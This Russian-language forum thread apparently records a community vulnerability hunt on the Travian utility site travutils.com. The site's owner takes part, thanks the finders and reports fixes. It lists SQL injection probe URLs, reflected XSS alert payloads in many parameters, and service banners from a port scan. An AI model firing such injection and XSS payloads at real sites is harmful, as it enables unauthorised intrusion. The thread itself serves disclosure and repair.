Есть скуль иньекция но пока еще не нашел вывод
http://travutils.com/?s=com7_2006&ida=-4716%20union%20select%201111,1111,3333,4444,5555,6 666,7777,8888,9999/*
Могу добавить что версия мускула вроде пятая, так как реагирует на information_schema.tables

http://travutils.com/?%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/?s=com7_2006&kw=%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/?s=cat1&idu=%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/?s=cat1&ally=%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/index.php?s=cat1&%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/index.php?s=cat1&user=%22%3E%3Cscript%3Ealert(99)% 3C/script%3E
http://travutils.com/de/?%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/fr/?%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/uk/?%22%3E%3Cscript%3Ealert(99)%3C/script%3E
http://travutils.com/ru/?%22%3E%3Cscript%3Ealert(99)%3C/script%3E
пути:
http://travutils.com/?s=cat1&archiv=1'
//
http://travutils.com/?s=cat1&archiv=1+order+by+1/*

http://travutils.com/p/s/map.php?s=cz1&idv=1'&size=125&t=2&nocache
http://travutils.com/p/s/map.php?s=cz1&idv=181591&size='&t=2&nocache
http://travutils.com/p/s/map.php?s=cz1&idu=1'&size=125&t=2&nocache
http://travutils.com/p/s/map.php?s=cz1&ida=1'&size=125&t=2&nocache
Стоит на 3306 порту 5.0.32-Debian_7etch1
SMTP ---- ESMTP Postfix
SSH-2.0-OpenSSH_4.3p2
vsFTPd 2.0.5
Насканил xSpider-ом...Лень было руками загребущими разгребать...

sql инъекция, я думаю, невозможна. Ну или по крайней мере бессмысленна. При выполнении любого скрипта работающего с базой сначала выполняется код:
Почти во всех запросах входящие параметры берутся в кавычки, а там где не берутся - там и может быть уязвимость. Но об этом я давно в кусе, и в новой версии сайта уже такого не будет.
Далее, даже если и добрались до осмысленного sql инъекции - у вас есть право только на чтение (sql пользователь, который работает от сайта). А поскольку на данный момент "все данные для всех" то и угрозы оно никакой не представляет.

На тему javascript... BlackCats полный зачёт! Спасибо большое!

Lithium спасибо за дырку в генераторе карты... особенно за вторую ссылку.

На тему сканирования портов и аналогичных заметных вещей - я бы не советовал чего-то подобного делать, потому что хостинговые админы недавно отбились от крупной DDoS атаки и посему страшно злые...

ЗЫ. Всем спасибо большое, в новой версии сайта будет защита от всего найденного!

Может лучше тестировать http://new.travutils.com/ ? Бо там я чуть-что буду исправлять всё подряд. Вплоть до идеального блеска... я думаю это будет всем интересно. Что скажете?

http://new.travutils.com/ тут работает кнопка "вход" и всё что дальше от неё, кроме "забыли пароль?". Это на текущий момент.

ЗЫ. К модераторам - на http://new.travutils.com/ тоже разместить ссылку?

http://new.travutils.com/?login=admin&pass=lalala&antybot=8150025&submit_lo gin="><script>alert()</script>&long=on

http://new.travutils.com/?login=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3 E&pass1=lalala&email=%3Cscript%3Ealert%28%29%3C%3F script%3E&acept=on&antybot=8150025&submit_register =%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0%B8% D1%82%D1%8C

Странно блин...Инклуд...http://new.travutils.com/?w=s...

Сейчас это нормально. Алгоритм распарсивания url я уже прицепил к новому сайту, а наполнять содержимым ещё нет. Ибо логины надо сначала осилить.

Дыру с языками заделал спасибо большое! Вот код, составления строки с новым языком (чтобы легче искать дыру было):

Lithium на тему скана портов - незнаю. Не сильно в этом разбираюсь. Но то что админы в последнее время злые - это 100%

BlackCats, всё кроме "путей" на основном сайте исправил, это был тот же глюк что нашёл чуть позже Lithium на новом сайте, только сейчас разобрался что это одно и тоже.

Ещё раз спасибо всем за поиски дыр.